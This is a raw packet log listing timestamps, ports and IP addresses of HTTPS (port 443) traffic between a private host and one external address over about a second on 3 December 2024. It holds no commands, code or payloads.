Dec 3, 2024 14:28:45.191747904 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191797972 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191808939 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191840887 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191848040 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191900969 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191907883 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.191977978 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.191987991 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192044973 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192054987 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192090988 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192099094 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192163944 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192172050 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192337036 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192349911 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192394972 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192403078 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192542076 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192553997 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192593098 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192606926 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192683935 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192693949 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192846060 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192861080 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192923069 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192930937 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.192967892 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.192975044 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193234921 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193248987 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193280935 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193289042 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193346977 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193356037 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193391085 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193398952 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193442106 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193449020 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193552971 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193552971 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193562031 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193568945 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193747997 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193762064 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.193802118 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193923950 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.193979979 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.194091082 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.194144011 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.235330105 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.235630035 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.235723972 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.235914946 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.235949039 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.235991955 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.236027956 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.279335022 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.279706955 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.279784918 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.279967070 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.279990911 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.280061960 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.323332071 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.323731899 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.323812962 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.323870897 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.323916912 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.323970079 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.371326923 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.371635914 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.371800900 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.371886015 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.371980906 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.372090101 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.372165918 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.419332981 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.419610977 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.419698954 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.419764042 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.419817924 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.419898033 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.432754993 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.432909966 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.432924032 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.432949066 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.433262110 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.433306932 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.433343887 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.433372974 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.433408976 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.479321957 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.479674101 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.479736090 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.479799986 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.479863882 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.480062962 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.480110884 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.527323008 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.527724981 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.527879953 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.527982950 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.528099060 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.528189898 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.554193020 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.555425882 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.555435896 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.555552959 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.555680990 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.555754900 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.555804014 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.555851936 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.555902004 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.603326082 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.603693962 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.603746891 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.603797913 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.603864908 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.604116917 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.604173899 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.651324987 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.651607037 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.651673079 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.651730061 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.651791096 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.651858091 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.670262098 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.670536995 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.670546055 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.670795918 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.670850992 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.670897961 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.670932055 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.670950890 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.670994997 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.674652100 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.674837112 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.674846888 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.674902916 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.674963951 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.675158978 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.675158978 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.675194979 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.675225973 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.715023041 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.715473890 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.715485096 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.715523958 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.715589046 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.715635061 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.715691090 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.715725899 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.759325027 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.759677887 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.759712934 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.759741068 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.759773016 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.759819031 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.794137955 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.794425964 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.794441938 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.794501066 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.794558048 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.794588089 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.794814110 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.794857025 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.794898033 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.795694113 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.795825005 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.795838118 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.795878887 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.795890093 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.795960903 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.796019077 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.796072006 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.796101093 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.796233892 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.796278000 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.796941042 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.797066927 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.797075987 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.797120094 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.797127962 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.797199011 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.797250986 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.797303915 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.797354937 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.797388077 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798360109 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.798518896 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798528910 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.798553944 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798561096 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.798568964 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798580885 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798610926 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798649073 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798691034 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798717022 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798765898 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798775911 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798831940 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798855066 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.798894882 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.843323946 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.843651056 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.843702078 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.843755960 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.843822956 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.843883038 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.843915939 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.844183922 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.844254017 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.844293118 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.844331026 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.891329050 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.892165899 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.892244101 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.892293930 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.892339945 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.892364025 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.896727085 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.896939993 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.896986961 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.910705090 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.910794020 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.910921097 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.910943985 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.911012888 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.911083937 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.911128998 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.911149979 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.911334038 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.911417961 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.911482096 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.913703918 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.913764954 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.914000988 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.914021969 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.915080070 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.915199995 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915225983 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915236950 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915246964 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915326118 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915369987 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915411949 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915476084 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915496111 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.915628910 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.916270018 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.916395903 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.916523933 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.916569948 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.916589975 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.916599035 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.916609049 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.916620016 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.917790890 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.917908907 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.917922974 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.917958021 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.918294907 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.918322086 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.919353008 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.919466972 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.919485092 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.919507980 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.919961929 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.919981956 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920216084 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920304060 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920416117 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920449018 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920468092 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920527935 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920527935 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920547009 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920551062 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920568943 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920581102 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920589924 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920609951 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920620918 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920640945 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920648098 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920659065 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920666933 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920680046 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920696974 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920710087 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920720100 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920733929 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920739889 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.920748949 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920802116 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920839071 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920872927 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920878887 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920895100 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.920919895 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.921895027 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.921937943 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.922138929 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.922154903 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.923999071 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.924021959 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.955954075 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.956017971 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.956172943 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.956202984 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:45.956214905 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.956316948 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:45.956335068 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.003206968 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.003305912 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.003408909 CET	49884	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.032105923 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.032185078 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.034981966 CET	443	49884	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.141896963 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.142003059 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.142633915 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.142653942 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.142847061 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.142852068 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.143100977 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.143112898 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.143277884 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.143296003 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.143388033 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.143493891 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.143590927 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.143604994 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.143615007 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.143623114 CET	443	49889	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:46.143635988 CET	49889	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:46.143644094 CET	49889	443	192.168.2.5	149.154.167.220
